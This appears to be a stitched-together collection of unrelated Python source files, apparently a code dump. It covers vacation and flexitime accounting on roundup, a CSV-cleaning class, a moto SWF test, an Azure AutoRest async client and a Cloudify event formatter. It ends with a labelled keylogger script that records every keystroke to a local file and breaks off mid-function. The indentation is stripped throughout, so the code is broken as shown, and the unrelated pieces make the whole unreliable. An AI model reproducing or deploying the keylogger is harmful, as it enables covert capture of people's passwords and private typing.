""" Get latest absolute vacation_correction.
Special handling of ctype: None means ctype 'None' while -1
means "don't care, search for *any* ctype". Note that roundups
interface for searching specifies -1 when searching for an
empty link....
"""
if date is None :
date = Date ('.')
dt = ";%s" % date.pretty (common.ymd)
d = dict \
( user = user
, absolute = True
, date = dt
)
# If no ctype given, try to get dyn. user record on date and use
# ctype from there. If not found we simply search for the latest
# vacation correction before date.
if ctype == -1 :
dyn = user_dynamic.get_user_dynamic (db, user, date)
if dyn :
ctype = dyn.contract_type
if ctype != -1 :
d ['contract_type'] = ctype
if ctype is None :
d ['contract_type'] = '-1' # roundup: -1 means search empty
vcs = db.vacation_correction.filter (None, d, sort = [('-', 'date')])
if not vcs :
return
for id in vcs :
vc = db.vacation_correction.getnode (id)
if ctype == -1 or vc.contract_type == ctype :
return vc
# end def get_vacation_correction
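# Hedged sketch (not part of the original code): the ctype convention used
# by get_vacation_correction above, reduced to the filter spec it builds.
# -1 means "any contract_type" (no constraint), None means "empty link",
# which roundup expects as the string '-1'. User id and date are assumptions.
def _vc_filter_example (user, ctype, pretty_date) :
    """ >>> _vc_filter_example ('4711', -1, '2020-01-01').get ('contract_type')
        >>> _vc_filter_example ('4711', None, '2020-01-01') ['contract_type']
        '-1'
        >>> _vc_filter_example ('4711', '2', '2020-01-01') ['contract_type']
        '2'
    """
    d = dict (user = user, absolute = True, date = ";%s" % pretty_date)
    if ctype != -1 :
        d ['contract_type'] = ctype
    if ctype is None :
        d ['contract_type'] = '-1' # roundup: -1 searches for an empty link
    return d
# end def _vc_filter_example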
def vacation_wps (db) :
# All work packages belonging to vacation time projects
vtp = db.time_project.filter (None, dict (is_vacation = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def vacation_wps
def special_wps (db) :
# All work packages belonging to special-leave time projects
vtp = db.time_project.filter (None, dict (is_special_leave = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def special_wps
def flexi_wps (db) :
# All work packages belonging to flexitime time projects
vtp = db.time_project.filter \
(None, dict (max_hours = 0, approval_required = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def flexi_wps
def vacation_time_sum (db, user, ctype, start, end) :
dt = common.pretty_range (start, end)
dr = db.daily_record.filter (None, dict (user = user, date = dt))
dtt = [('+', 'daily_record.date')]
vwp = vacation_wps (db)
trs = db.time_record.filter \
(None, dict (daily_record = dr, wp = vwp), sort = dtt)
vac = 0.0
if ctype == -1 :
ctype = _get_ctype (db, user, Date ('.'))
by_dr = {}
for tid in trs :
tr = db.time_record.getnode (tid)
dr = db.daily_record.getnode (tr.daily_record)
dyn = user_dynamic.get_user_dynamic (db, user, dr.date)
# dyn is None if time_records booked but dyn record revoked for this period:
if not dyn or dyn.contract_type != ctype :
continue
wh = user_dynamic.day_work_hours (dyn, dr.date)
assert wh
if dr.id not in by_dr :
by_dr [dr.id] = (wh, [])
assert by_dr [dr.id][0] == wh
by_dr [dr.id][1].append (tr.duration)
for wh, durs in by_dr.itervalues () :
vac += ceil (sum (durs) / wh * 2) / 2.
return vac
# end def vacation_time_sum
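# Hedged illustration (not part of the original code): the rounding used in
# vacation_time_sum above converts booked hours into day fractions and
# rounds *up* to the next half day. The work-day length below is an
# assumption for illustration.
def _half_day_round_example (hours_booked, work_hours) :
    """ >>> _half_day_round_example (3.0, 7.7)
        0.5
        >>> _half_day_round_example (6.0, 7.7)
        1.0
    """
    from math import ceil
    return ceil (hours_booked / work_hours * 2) / 2.
# end def _half_day_round_example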
def _get_ctype (db, user, date) :
# None is a valid contract_type, return -1 in case of error
dyn = user_dynamic.get_user_dynamic (db, user, date)
if not dyn :
dyn = user_dynamic.last_user_dynamic (db, user, date)
if not dyn :
return -1
return dyn.contract_type
# end def _get_ctype
def remaining_vacation \
(db, user, ctype = -1, date = None, cons = None, to_eoy = True) :
""" Compute remaining vacation on the given date
"""
if date is None :
date = Date ('.')
pdate = date.pretty (common.ymd)
if ctype == -1 :
ctype = _get_ctype (db, user, date)
if ctype == -1 :
return
vac = None
try :
vac = db.rem_vac_cache.get ((user, ctype, pdate, to_eoy))
except AttributeError :
def vac_clear_cache (db) :
db.rem_vac_cache = {}
db.registerClearCacheCallback (vac_clear_cache, db)
db.rem_vac_cache = {}
if vac is not None :
return vac
vc = get_vacation_correction (db, user, ctype, date)
if not vc :
return
ed = next_yearly_vacation_date (db, user, ctype, date)
if not to_eoy :
ed = min (ed, date)
if cons is None :
cons = consolidated_vacation (db, user, ctype, date, vc, to_eoy)
vac = cons
vac -= vacation_time_sum (db, user, ctype, vc.date, ed)
# All vacation_correction records up to date but starting with one
# day later (otherwise we'll find the absolute correction)
# Also one day *earlier* than ed for the same reason.
dt = common.pretty_range (vc.date + common.day, ed - common.day)
d = dict (user = user, date = dt)
if ctype is not None :
d ['contract_type'] = ctype
ds = [('+', 'date')]
vcs = db.vacation_correction.filter (None, d, sort = ds)
for vcid in vcs :
vc = db.vacation_correction.getnode (vcid)
if vc.contract_type != ctype :
continue
assert not vc.absolute
vac += vc.days
db.rem_vac_cache [(user, ctype, pdate, to_eoy)] = vac
return vac
# end def remaining_vacation
def month_diff (d1, d2) :
""" Difference of two month which may be in suceeding years
>>> month_diff (Date ('2018-01-02'), Date ('2018-12-01'))
11
>>> month_diff (Date ('2018-12-01'), Date ('2019-01-01'))
1
>>> month_diff (Date ('2018-12-12'), Date ('2019-12-11'))
12
>>> month_diff (Date ('2018-12-12'), Date ('2019-12-12'))
12
"""
yd = d2.year - d1.year
md = d2.month - d1.month
return md + 12 * yd
# end def month_diff
def consolidated_vacation \
(db, user, ctype = -1, date = None, vc = None, to_eoy = True) :
""" Compute remaining vacation on the given date
"""
if date is None :
date = Date ('.')
if ctype == -1 :
ctype = _get_ctype (db, user, date)
if ctype == -1 :
return
vc = vc or get_vacation_correction (db, user, ctype, date)
if not vc :
return None
ed = next_yearly_vacation_date (db, user, ctype, date)
if not to_eoy :
ed = min (ed, date + common.day)
d = vc.date
dyn = vac_get_user_dynamic (db, user, ctype, d)
while dyn and dyn.valid_to and dyn.valid_to <= d :
dyn = vac_next_user_dynamic (db, dyn)
if dyn is None :
return None
vac = float (vc.days)
msg = "vac_aliq None for user_dynamic%s" % dyn.id
assert dyn.vac_aliq, msg
va = db.vac_aliq.getnode (dyn.vac_aliq)
assert va.name in ('Daily', 'Monthly')
# Need to skip first period without a dyn user record
# sd is the current start date for German aliquotation
# We subtract 1 day to easily compare the day of the ending-date
# with the day of the start date
sd = d
# This is used for corrections if the start day lies beyond 28 -- in
# that case there are months that simply don't have that date. So we
# must correct for this in months with less days.
sd_day = 0
if dyn.valid_from > d :
sd = d = dyn.valid_from
while dyn and d < ed :
if dyn.valid_from > d :
# We want to check if the days that are lost here whenever a
# jump in dyn user records occurs are OK for monthly aliquotation
sd = d = dyn.valid_from
continue
assert not dyn.valid_to or dyn.valid_to > d
eoy = Date ('%s-12-31' % d.year)
msg = "vacation_yearly None for user_dynamic%s" % dyn.id
assert dyn.vacation_yearly is not None, msg
msg = ( "vac_aliq changes w/o absolute vac_corr for user_dynamic%s"
% dyn.id
)
assert dyn.vac_aliq == va.id, msg
if dyn.valid_to and dyn.valid_to <= ed and dyn.valid_to < eoy :
if va.name == 'Daily' :
yd = float (common.ydays (dyn.valid_to))
vac += interval_days \
(dyn.valid_to - d) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, dyn.valid_to)
dy = sd_day or sd.day
if dyn.valid_to.day < dy :
md -= 1
# Example: sd = 2018-04-03 valid_to = 2018-06-01
# Need to set sd=2018-05-03, i.e. the next start
# day before valid_to
# Even more complex is the case where e.g.
# sd = 2018-03-31 valid_to = 2018-05-01
# We set sd=2018-04-30 and sd_day=31
# Get last day of last month
lm = dyn.valid_to - Interval ('%sd' % dyn.valid_to.day)
em = common.end_of_month (lm)
if dy > em.day :
sd_day = sd.day
sd = em
else :
sd = Date (lm.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
else :
sd = Date (dyn.valid_to.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
d = dyn.valid_to
vac += dyn.vacation_yearly * md / 12.0
dyn = vac_next_user_dynamic (db, dyn)
elif eoy < ed :
if va.name == 'Daily' :
yd = float (common.ydays (eoy))
iv = eoy + common.day - d
vac += interval_days (iv) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, eoy)
dy = sd_day or sd.day
assert eoy.day >= dy
if dy == 1 :
md += 1
sd = eoy + common.day
else :
sd = Date (eoy.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
vac += dyn.vacation_yearly * md / 12.0
d = eoy + common.day
if dyn.valid_to == d :
dyn = vac_next_user_dynamic (db, dyn)
else :
if va.name == 'Daily' :
yd = float (common.ydays (ed - common.day))
vac += interval_days (ed - d) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, ed)
dy = sd_day or sd.day
if ed.day < dy :
md -= 1
sd = ed
vac += dyn.vacation_yearly * md / 12.0
d = ed
return vac
# end def consolidated_vacation
def valid_wps \
(db, filter = {}, user = None, date = None, srt = None, future = False) :
srt = srt or [('+', 'id')]
wps = {}
date = date or Date ('.')
dt = (date + common.day).pretty (common.ymd)
d = {}
if not future :
d ['time_start'] = ';%s' % date.pretty (common.ymd)
# Only select WPs that are not exclusively managed by external tool
d ['is_extern'] = False
d ['project.is_extern'] = False
d.update (filter)
wp = []
if user :
d1 = dict (d, is_public = True, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, is_public = True, time_end = '%s;' % dt)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, bookers = user, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, bookers = user, time_end = '%s;' % dt)
wp.extend (db.time_wp.filter (None, d1, srt))
else :
d1 = dict (d, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, time_end = '%s;' % dt)
wp.extend (db.time_wp.filter (None, d1, srt))
# Filter again via db to get sorting right
return db.time_wp.filter (wp, {}, sort = srt)
# end def valid_wps
def valid_leave_wps (db, user = None, date = None, srt = None, thawed = None) :
""" If thawed is given, find only WPs with an end-time > freeze date
If thawed *and* a date is given we use the *later* date
Note that for thawed to work a user must be given
"""
if thawed and user :
freeze = freeze_date (db, user)
if freeze and date :
date = max (freeze, date)
elif freeze :
date = freeze
d = {'project.approval_required' : True}
return valid_wps (db, d, user, date, srt, future = True)
# end def valid_leave_wps
def valid_leave_projects (db) :
return db.time_project.filter (None, dict (approval_required = True))
# end def valid_leave_projects
def vac_get_user_dynamic (db, user, ctype, date) :
""" Get user_dynamic record for a vacation computation on the given
date. Note that there are cases where no dyn user record exists
exactly for the date but before -- or after. If the record
starts a vacation period (e.g. an initial absolute vacation
correction) there doesn't necessarily already exist a dynamic
user record. On the other hand when computing the vacation at
the end of a period no dyn user record may be available anymore
(e.g., because the person has left).
"""
dyn = user_dynamic.get_user_dynamic (db, user, date)
if not dyn :
dyn = user_dynamic.find_user_dynamic (db, user, date, '-')
if ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = vac_prev_user_dynamic (db, dyn, ctype)
if not dyn :
dyn = user_dynamic.find_user_dynamic (db, user, date, '+')
if ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = vac_next_user_dynamic (db, dyn, ctype)
return dyn
# end def vac_get_user_dynamic
def vac_next_user_dynamic (db, dyn, ctype = -1) :
if ctype == -1 :
ctype = dyn.contract_type
dyn = user_dynamic.next_user_dynamic (db, dyn)
while ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = user_dynamic.next_user_dynamic (db, dyn)
return dyn
# end def vac_next_user_dynamic
def vac_prev_user_dynamic (db, dyn, ctype = -1) :
if ctype == -1 :
ctype = dyn.contract_type
dyn = user_dynamic.prev_user_dynamic (db, dyn)
while ( dyn
and ( dyn.contract_type != ctype
or not dyn.vacation_month
or not dyn.vacation_day
)
) :
dyn = user_dynamic.prev_user_dynamic (db, dyn)
return dyn
# end def vac_prev_user_dynamic
def need_hr_approval \
(db, tp, user, ctype, first_day, last_day, stname, booked = False) :
if tp.approval_hr :
return True
if stname != 'submitted' :
return False
if not tp.is_vacation :
# Flexitime
if tp.no_overtime and tp.max_hours == 0 :
dyn = user_dynamic.get_user_dynamic (db, user, first_day)
if not dyn or not dyn.all_in :
return False
fd = first_day
if first_day.year != last_day.year :
while fd.year != last_day.year :
eoy = common.end_of_year (fd)
rem = flexi_remain (db, user, fd, ctype)
dur = leave_days (db, user, fd, eoy)
if rem - dur < 0 :
return True
fd = eoy + common.day
rem = flexi_remain (db, user, fd, ctype)
dur = leave_days (db, user, fd, last_day)
return rem - dur < 0
else :
return False
day = common.day
ed = next_yearly_vacation_date (db, user, ctype, last_day) - day
vac = remaining_vacation (db, user, ctype, ed)
assert vac is not None
dur = leave_days (db, user, first_day, last_day)
# don't count duration if this is already booked, otherwise we would
# count this vacation twice.
if booked :
dur = 0
return ceil (vac) - dur < 0
# end def need_hr_approval
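# Hedged illustration (not part of the original code): the final vacation
# check in need_hr_approval above. HR approval is required when the
# requested leave days exceed the remaining vacation rounded up to full
# days. The numbers below are assumptions for illustration.
def _needs_hr_example (remaining_vacation_days, requested_days) :
    """ >>> _needs_hr_example (4.3, 5)
        False
        >>> _needs_hr_example (4.3, 6)
        True
    """
    from math import ceil
    return ceil (remaining_vacation_days) - requested_days < 0
# end def _needs_hr_example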
def vacation_params (db, user, date, vc, hv = False) :
""" Compute parameters needed for initializing vacation report,
returns the last total vacation (initial carry-over for start of
vacation or consolidated vacation from last year) and the
current carry (initial carry-over for start of vacation or last
remaining vacation). This is used for summary data in the
summary report and for vacation display in the leave mask.
"""
day = common.day
carry = None
ltot = None
ctype = vc.contract_type
yday = next_yearly_vacation_date (db, user, ctype, date) - day
if yday :
pd = prev_yearly_vacation_date (db, user, ctype, yday)
if not pd or vc.date == pd :
pd = vc.date
carry = ltot = vc.days
else :
carry = remaining_vacation (db, user, ctype, pd - day)
ltot = consolidated_vacation (db, user, ctype, pd - day)
carry = carry or 0.0
ltot = ltot or 0.0
return yday, pd, carry, ltot
# end def vacation_params
def get_current_ctype (db, user, dt = None) :
if dt is None :
dt = Date ('.')
dyn = user_dynamic.get_user_dynamic (db, user, dt)
if not dyn :
return None
ctype = dyn.contract_type
return ctype
# end def get_current_ctype
def flexi_alliquot (db, user, date_in_year, ctype) :
""" Loop over all dyn records in this year and use only those with
all-in set. For those we count the days and compute the
year-aliquot number of max_flexitime days.
"""
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
flex = 0.0
dsecs = 0.0
ds = 24 * 60 * 60
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in or dyn.contract_type != ctype :
continue
vf = dyn.valid_from
if vf < y :
vf = y
vt = dyn.valid_to
if not vt or vt > eoy + common.day :
vt = eoy + common.day
flex += (vt - vf).as_seconds () * (dyn.max_flexitime or 0)
dsecs += (vt - vf).as_seconds ()
assert dsecs / ds <= 366
if not flex :
return 0.0
days = float ((eoy + common.day - y).as_seconds () / ds)
flex /= ds
return ceil (flex / days)
# end def flexi_alliquot
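# Hedged illustration (not part of the original code): flexi_alliquot above
# weights max_flexitime by the fraction of the year covered by all-in dyn
# records and rounds up. The numbers below are assumptions: one record
# covering 183 of 365 days with max_flexitime = 10 yields ceil(10 * 183/365).
def _flexi_aliquot_example (covered_days, year_days, max_flexitime) :
    """ >>> int (_flexi_aliquot_example (183, 365, 10))
        6
    """
    from math import ceil
    return ceil (covered_days * max_flexitime / float (year_days))
# end def _flexi_aliquot_example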
def avg_hours_per_week_this_year (db, user, date_in_year) :
""" Loop over all dyn records in this year and use only those with
all-in set. For those we count the hours and compute the
average over all all-in days.
"""
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
now = Date ('.')
if eoy > now :
eoy = now
hours = 0.0
dsecs = 0.0
ds = 24 * 60 * 60
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in :
continue
vf = dyn.valid_from
if vf < y :
vf = y
vt = dyn.valid_to
if not vt or vt > eoy + common.day :
vt = eoy + common.day
dsecs += (vt - vf).as_seconds ()
drs = db.daily_record.filter \
(None, dict (date = common.pretty_range (vf, vt), user = user))
for drid in drs :
dr = db.daily_record.getnode (drid)
dur = user_dynamic.update_tr_duration (db, dr)
hours += dur
days = dsecs / ds
assert days <= 366
if not days :
return 0
avgday = hours / float (days)
return avgday * 7
# end def avg_hours_per_week_this_year
def get_all_in_ctypes (db, user, y) :
ctypes = set ()
for dyn in user_dynamic.user_dynamic_year_iter (db, user, y) :
if not dyn.all_in :
continue
ctypes.add (dyn.contract_type)
return ctypes
# end def get_all_in_ctypes
def flexi_remain (db, user, date_in_year, ctype) :
y = common.start_of_year (date_in_year)
eoy = common.end_of_year (y)
fa = flexi_alliquot (db, user, date_in_year, ctype)
acpt = db.leave_status.lookup ('accepted')
cnrq = db.leave_status.lookup ('cancel requested')
if not fa :
return 0
sd = 0
dyn = user_dynamic.get_user_dynamic (db, user, y)
if not dyn :
dyn = user_dynamic.first_user_dynamic (db, user, y)
while dyn :
# Check the case that we found a dyn user record far in the past
if dyn.valid_to and dyn.valid_to < y :
dyn = user_dynamic.next_user_dynamic (db, dyn)
continue
if dyn.contract_type == ctype :
b = dyn.valid_from
if b < y :
b = y
if b > eoy :
break
e = dyn.valid_to
if e > eoy or not e :
e = eoy
else :
e -= common.day
ct = dyn.contract_type
if dyn.all_in :
sd += flexitime_submission_days (db, user, ct, b, e, acpt, cnrq)
dyn = user_dynamic.next_user_dynamic (db, dyn)
return fa - sd
# end def flexi_remain
def fix_vacation (db, uid, date_from = None, date_to = None) :
""" Fix vacation for a user where the dyn. user record has been
changed *after* the user already booked vacation.
We search for all time-records with a daily-record in state
'leave' since the last frozen time or date_from if given.
"""
#print ("fix_vacation: %s %s %s" % (uid, date_from, date_to))
if date_from is None :
date_from = Date ('2000-01-01')
frozen = db.daily_record_freeze.filter \
(None, dict (user = uid, frozen = True), sort = ('-', 'date'))
if frozen :
frozen = db.daily_record_freeze.getnode (frozen [0])
date_from = frozen.date + common.day
leave = db.daily_record_status.lookup ('leave')
d = dict ()
d ['daily_record.user'] = uid
d ['daily_record.date'] = common.pretty_range (date_from, date_to)
d ['daily_record.status'] = leave
trs = db.time_record.filter (None, d)
for trid in trs :
tr = db.time_record.getnode (trid)
dr = db.daily_record.getnode (tr.daily_record)
wp = db.time_wp.getnode (tr.wp)
tp = db.time_project.getnode (wp.project)
if not tp.is_vacation and not tp.is_public_holiday :
continue
du = leave_duration (db, uid, dr.date, tp.is_public_holiday)
if tr.duration != du :
#print "Wrong: time_record%s: %s->%s" % (trid, tr.duration, du)
db.time_record.set (trid, duration = du)
# end def fix_vacation
### __END__
|
from datetime import datetime
from os import listdir
import pandas
from application_logging.logger import App_Logger
class dataTransform:
"""
This class shall be used for transforming the Good Raw Training Data before loading it into the database.
Written By: iNeuron Intelligence
Version: 1.0
Revisions: None
"""
def __init__(self):
self.goodDataPath = "Training_Raw_files_validated/Good_Raw"
self.logger = App_Logger()
def replaceMissingWithNull(self):
"""
Method Name: replaceMissingWithNull
Description: This method replaces the missing values in columns with "NULL" to
store in the table. We are using substring in the first column to
keep only "Integer" data for ease up the loading.
This column is anyways going to be removed during training.
Written By: iNeuron Intelligence
Version: 1.0
Revisions: None
"""
log_file = open("Training_Logs/dataTransformLog.txt", 'a+')
try:
onlyfiles = [f for f in listdir(self.goodDataPath)]
for file in onlyfiles:
csv = pandas.read_csv(self.goodDataPath+"/" + file)
csv.fillna('NULL',inplace=True)
csv.to_csv(self.goodDataPath+ "/" + file, index=None, header=True)
self.logger.log(log_file," %s: File Transformed successfully!!" % file)
#log_file.write("Current Date :: %s" %date +"\t" + "Current time:: %s" % current_time + "\t \t" + + "\n")
except Exception as e:
self.logger.log(log_file, "Data Transformation failed because:: %s" % e)
#log_file.write("Current Date :: %s" %date +"\t" +"Current time:: %s" % current_time + "\t \t" + "Data Transformation failed because:: %s" % e + "\n")
log_file.close()
log_file.close()
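# Hedged standalone sketch (not part of the class above): the core of
# replaceMissingWithNull is a pandas fillna round-trip per CSV file.
# The path below is an illustrative assumption, not read from config.
def _fillna_example(csv_path="Training_Raw_files_validated/Good_Raw/sample.csv"):
    df = pandas.read_csv(csv_path)
    df.fillna('NULL', inplace=True)  # missing cells become the string 'NULL'
    df.to_csv(csv_path, index=None, header=True)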
|
from freezegun import freeze_time
import sure # noqa # pylint: disable=unused-import
from moto.swf.models import HistoryEvent
@freeze_time("2015-01-01 12:00:00")
def test_history_event_creation():
he = HistoryEvent(123, "DecisionTaskStarted", scheduled_event_id=2)
he.event_id.should.equal(123)
he.event_type.should.equal("DecisionTaskStarted")
he.event_timestamp.should.equal(1420113600.0)
@freeze_time("2015-01-01 12:00:00")
def test_history_event_to_dict_representation():
he = HistoryEvent(123, "DecisionTaskStarted", scheduled_event_id=2)
he.to_dict().should.equal(
{
"eventId": 123,
"eventType": "DecisionTaskStarted",
"eventTimestamp": 1420113600.0,
"decisionTaskStartedEventAttributes": {"scheduledEventId": 2},
}
)
def test_history_event_breaks_on_initialization_if_not_implemented():
HistoryEvent.when.called_with(123, "UnknownHistoryEvent").should.throw(
NotImplementedError
)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, Awaitable, Optional, TYPE_CHECKING
from azure.core import AsyncPipelineClient
from azure.core.rest import AsyncHttpResponse, HttpRequest
from msrest import Deserializer, Serializer
from ._configuration import AutoRestComplexTestServiceConfiguration
from .operations import (
ArrayOperations,
BasicOperations,
DictionaryOperations,
FlattencomplexOperations,
InheritanceOperations,
PolymorphicrecursiveOperations,
PolymorphismOperations,
PrimitiveOperations,
ReadonlypropertyOperations,
)
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Dict
class AutoRestComplexTestService:
"""Test Infrastructure for AutoRest.
:ivar basic: BasicOperations operations
:vartype basic: bodycomplexpython3only.aio.operations.BasicOperations
:ivar primitive: PrimitiveOperations operations
:vartype primitive: bodycomplexpython3only.aio.operations.PrimitiveOperations
:ivar array: ArrayOperations operations
:vartype array: bodycomplexpython3only.aio.operations.ArrayOperations
:ivar dictionary: DictionaryOperations operations
:vartype dictionary: bodycomplexpython3only.aio.operations.DictionaryOperations
:ivar inheritance: InheritanceOperations operations
:vartype inheritance: bodycomplexpython3only.aio.operations.InheritanceOperations
:ivar polymorphism: PolymorphismOperations operations
:vartype polymorphism: bodycomplexpython3only.aio.operations.PolymorphismOperations
:ivar polymorphicrecursive: PolymorphicrecursiveOperations operations
:vartype polymorphicrecursive:
bodycomplexpython3only.aio.operations.PolymorphicrecursiveOperations
:ivar readonlyproperty: ReadonlypropertyOperations operations
:vartype readonlyproperty: bodycomplexpython3only.aio.operations.ReadonlypropertyOperations
:ivar flattencomplex: FlattencomplexOperations operations
:vartype flattencomplex: bodycomplexpython3only.aio.operations.FlattencomplexOperations
:keyword endpoint: Service URL. Default value is 'http://localhost:3000'.
:paramtype endpoint: str
"""
def __init__(self, *, endpoint: str = "http://localhost:3000", **kwargs: Any) -> None:
self._config = AutoRestComplexTestServiceConfiguration(**kwargs)
self._client = AsyncPipelineClient(base_url=endpoint, config=self._config, **kwargs)
self._serialize = Serializer()
self._deserialize = Deserializer()
self._serialize.client_side_validation = False
self.basic = BasicOperations(self._client, self._config, self._serialize, self._deserialize)
self.primitive = PrimitiveOperations(self._client, self._config, self._serialize, self._deserialize)
self.array = ArrayOperations(self._client, self._config, self._serialize, self._deserialize)
self.dictionary = DictionaryOperations(self._client, self._config, self._serialize, self._deserialize)
self.inheritance = InheritanceOperations(self._client, self._config, self._serialize, self._deserialize)
self.polymorphism = PolymorphismOperations(self._client, self._config, self._serialize, self._deserialize)
self.polymorphicrecursive = PolymorphicrecursiveOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.readonlyproperty = ReadonlypropertyOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.flattencomplex = FlattencomplexOperations(self._client, self._config, self._serialize, self._deserialize)
def send_request(self, request: HttpRequest, **kwargs: Any) -> Awaitable[AsyncHttpResponse]:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = await client.send_request(request)
<AsyncHttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.AsyncHttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "AutoRestComplexTestService":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
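# Hedged usage sketch (not part of the generated client): constructing the
# client and sending a raw request through its pipeline. The endpoint is the
# documented default; the request path below is an illustrative assumption.
async def _usage_example() -> None:
    async with AutoRestComplexTestService(endpoint="http://localhost:3000") as client:
        request = HttpRequest("GET", "/complex/basic/valid")
        response = await client.send_request(request)
        print(response.status_code)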
|
########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudify._compat import StringIO
HIGH_VERBOSE = 3
MEDIUM_VERBOSE = 2
LOW_VERBOSE = 1
NO_VERBOSE = 0
class Event(object):
def __init__(self, event, verbosity_level=NO_VERBOSE):
self._event = event
self._verbosity_level = verbosity_level
def __str__(self):
deployment_id = self.deployment_id
printable_timestamp = self.printable_timestamp
event_type_indicator = self.event_type_indicator
message = self.text
info = self.operation_info
if info: # spacing in between of the info and the message
info += ' '
return u'{0} {1} {2} {3}{4}'.format(
printable_timestamp,
event_type_indicator,
deployment_id,
info,
message)
@property
def has_output(self):
return (not self.is_log_message or
self._verbosity_level >= MEDIUM_VERBOSE or
self.log_level != 'DEBUG')
@property
def operation_info(self):
operation = self.operation
node_id = self.node_id
source_id = self.source_id
target_id = self.target_id
context = self._event['context']
group = context.get('group')
policy = context.get('policy')
trigger = context.get('trigger')
if source_id is not None:
info = '{0}->{1}|{2}'.format(source_id, target_id, operation)
else:
info_elements = [
e for e in [node_id, operation, group, policy, trigger]
if e is not None]
info = '.'.join(info_elements)
if info:
info = '[{0}]'.format(info)
return info
@property
def text(self):
message = self._event['message']['text']
if self.is_log_message:
message = u'{0}: {1}'.format(self.log_level, message)
elif (self.event_type in ('task_rescheduled', 'task_failed')):
causes = self._event['context'].get('task_error_causes', [])
if causes:
multiple_causes = len(causes) > 1
causes_out = StringIO()
if multiple_causes:
causes_out.write('Causes (most recent cause last):\n')
for cause in causes:
if multiple_causes:
causes_out.write('{0}\n'.format('-' * 32))
tb = cause.get('traceback')
if tb:
causes_out.write(tb)
causes = causes_out.getvalue()
if causes:
message = u'{0}\n{1}'.format(message, causes)
return message
@property
def log_level(self):
return self._event['level'].upper()
@property
def timestamp(self):
return self._event.get('@timestamp') or \
self._event.get('reported_timestamp') or \
self._event['timestamp']
@property
def printable_timestamp(self):
return self.timestamp.replace('T', ' ').replace('Z', '')
@property
def event_type_indicator(self):
return 'LOG' if self.is_log_message else 'CFY'
@property
def operation(self):
op = self._event['context'].get('operation')
if op is None:
return None
return op.split('.')[-1]
@property
def node_id(self):
return self._event['context'].get('node_id')
@property
def source_id(self):
return self._event['context'].get('source_id')
@property
def target_id(self):
return self._event['context'].get('target_id')
@property
def deployment_id(self):
return '<{0}>'.format(self._event['context']['deployment_id'])
@property
def event_type(self):
return self._event.get('event_type') # not available for logs
@property
def is_log_message(self):
return 'cloudify_log' in self._event['type']
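# Hedged usage sketch (not part of the original module): operation_info above
# renders either "source->target|operation" or a dot-joined node/operation
# form, wrapped in brackets. The event dict below is a minimal assumption
# containing only the context keys that property reads.
def _operation_info_example():
    ev = Event({'context': {
        'source_id': 'node_a_1',
        'target_id': 'node_b_1',
        'operation': 'cloudify.interfaces.relationship_lifecycle.establish',
    }})
    return ev.operation_info  # -> '[node_a_1->node_b_1|establish]'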
|
# Keylogger by Mahesh Sawant.
import pynput
from pynput.keyboard import Key,Listener
count = 0
keys = []
def on_press(key):
global keys, count
keys.append(key)
count+=1
print("{0} pressed".format(key))
if count >= 1:
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open("log.txt","a") as f:
for key in keys:
k=str(key).replace("'","")
if k.find("backspace") > 0:
f.write("Backspace_key ")
elif k.find("enter") > 0:
f.write('\n')
elif k.find("shift") > 0:
f.write("Shift_key ")
elif k.find("space") > 0:
f.write(" ")
elif k.find("caps_lock") >0 :
f.write("caps_Lock_key ")
elif k.find("Key"):
f.write(k)
def on_release(key):
global exit
if key == Key.esc:
